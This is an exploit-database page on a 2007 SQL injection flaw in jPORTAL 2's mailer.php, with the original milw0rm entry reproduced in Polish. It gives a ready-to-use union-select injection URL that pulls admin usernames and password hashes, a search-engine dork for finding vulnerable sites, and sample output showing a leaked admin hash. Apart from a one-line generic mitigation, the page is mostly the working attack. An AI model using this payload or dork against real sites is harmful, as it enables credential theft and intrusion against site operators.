header-logo
Suggest Exploit
vendor:
jPORTAL 2
by:
Kacper
7.5
CVSS
HIGH
Remote SQL Injection
89
CWE
Product Name: jPORTAL 2
Affected Version From: jPORTAL 2
Affected Version To: jPORTAL 2
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

jPORTAL 2 Remote SQL Injection Vulnerability

The vulnerability allows an attacker to execute SQL queries on the jPORTAL 2 mailer.php page. By injecting a malicious SQL query, an attacker can retrieve sensitive information, such as usernames and passwords, from the admins table. The exploit can be executed by appending a union select statement to the 'to' parameter in the URL.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize user input and use prepared statements or parameterized queries to prevent SQL injection attacks.
Source

Exploit-DB raw data:

Tytul: jPORTAL 2 Remote SQL Injection Vulnerability
dork:[ intext:"jPORTAL 2" & inurl:"mailer.php" ]

Autor: Kacper
E-Mail: kacper1964@yahoo.pl
Strona: devilteam.eu

Irc: irc.myg0t.com #devilteam

Blad:

mailer.php?to=999999999999'+union+select+0,1,2,3,4,5,concat(nick,char(58),pass),7+from+admins+limit+1/*

po wykonaniu zapytania wystarczy zajrzec w xrodlo strony i poszukac:

<input type="hidden" name="cmd" value="sendmail"><input type="hidden" name="to" value="admin:9b3a80a898fabc984e733d904027cc91"></td>

value="admin:9b3a80a898fabc984e733d904027cc91" < ----/  to Twoj rezultat wykonania zapytania SQL.

be safe all  :) 

# milw0rm.com [2007-11-06]

Navigation

Suggest Exploit

Services By CQR